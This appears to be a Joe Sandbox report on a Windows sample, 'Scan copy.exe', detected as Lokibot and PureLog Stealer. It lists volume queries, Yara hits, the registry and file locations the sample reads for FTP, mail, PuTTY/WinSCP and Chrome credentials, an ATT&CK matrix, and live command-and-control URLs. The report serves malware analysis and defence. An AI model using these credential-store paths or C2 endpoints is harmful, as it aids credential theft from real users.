Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Queries volume information: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000A.00000002.2502216653.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan copy.exe PID: 7380, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Scan copy.exe.51b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Scan copy.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Scan copy.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Scan copy.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Scan copy.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: PopPassword		20_2_0040D069
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: SmtpPassword		20_2_0040D069

Source: Yara match	File source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Scan copy.exe.51b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Scan copy.exe	32%	Virustotal		Browse
Scan copy.exe	24%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
Scan copy.exe	100%	Avira	HEUR/AGEN.1307356
Scan copy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	100%	Avira	HEUR/AGEN.1307356
C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	24%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Source	Detection	Scanner	Label	Link
94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware
https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac	0%	Avira URL Cloud	safe
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware
http://94.156.177.41/simple/five/fre.php	18%	Virustotal		Browse
https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac	0%	Virustotal		Browse
94.156.177.41/simple/five/fre.php	18%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
94.156.177.41/simple/five/fre.php	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/simple/five/fre.php	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac	Scan copy.exe, vLQwEscoQr.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Scan copy.exe, 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, vLQwEscoQr.exe, 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	vLQwEscoQr.exe, vLQwEscoQr.exe, 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564386
Start date and time:	2024-11-28 09:13:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Scan copy.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/17@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 77 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:14:10	API Interceptor	66x Sleep call for process: Scan copy.exe modified
03:14:12	API Interceptor	37x Sleep call for process: powershell.exe modified
03:14:15	API Interceptor	2x Sleep call for process: vLQwEscoQr.exe modified
09:14:13	Task Scheduler	Run new task: vLQwEscoQr path: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
